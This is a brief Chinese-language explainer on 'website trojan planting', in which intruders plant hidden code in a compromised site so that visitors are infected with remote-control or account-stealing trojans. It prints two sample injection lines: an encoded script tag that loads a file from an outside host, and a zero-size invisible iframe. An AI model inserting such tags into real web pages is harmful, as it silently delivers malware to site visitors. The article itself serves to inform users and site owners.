网站挂马的概述

很多朋友都碰到过这样的现象：打开一个网站，结果页面还没显示，xp系统下载的杀毒软件就开始报警，提示检测到木马病毒。

　　有经验的朋友会知道这是网页恶意代码，但是自己打开的明明是正规网站，没有哪家正规网站会将病毒放在自己的网页上吧?那么，是什么导致了这种现象的发生呢?其中最有可能的一个原因就是：这个网站被挂马了。

　　“挂马”这个词目前我们似乎经常能听到，那么什么是挂马呢?挂马就是黑客人侵了一些网站后，将自己编写的网页木马嵌人被黑网站的主页中，利用被 黑网站的流量将自己的网页木马传播开去，以达到不可告人的目的。例如很多游戏网站被挂马的目的就是盗取浏览该网站玩家的游戏账号，而那些大型网站被挂马， 则是为了搜集大量的肉鸡。网站被挂马不仅会让自己的网站失去信誉，丢失大童客户，也会让我们这些普通用户陷人黑客设下的陷阱，沦为黑客的肉鸡。下面就跟随xp系统之家来了解这种时下最流行的黑客攻击手段。

　　从“挂马”这个词中我们就可以知道，这和木马脱离不了关系。的确，挂马的目的就是将木马传播出去，挂马只是一种手段。挂马使用的木马大致可以分 为两类：一类是以远程控制为目的的木马，黑客使用这种木马进行挂马攻击，其目的是为了得到大量的肉鸡，以此对某些网站实施拒绝服务攻击或达到其他目的(目 前绝大多数实施拒绝服务攻击的傀儡计算机都是挂马攻击的受害音)。另一类是键盘记录木马，我们通常称其为盗号木马，其目的不言而喻，都是冲着我们的游戏账 号或者银行帐号来的。目前挂马所使用的木马多数属于后者。

　　目前，流行的网站挂马主要是使用在正常的页面中加载木马语句的方法，如：

　　<SCRIPTlanguage="JScript.Encode"src=http：//duze.net/m.asp></script>

　　<iframe src=http: //127 . 0.0 . 1 /m. htm width=0 height=O></iframe>

　　以第二条语句为例，通过“iframe”语句可以把m.htm这个文件内嵌在当前网页中，由于宽和高都设置为0，所以这个加载的页面内容是不可见的。

来自 http://www.xp74.com/article/news/3458.htm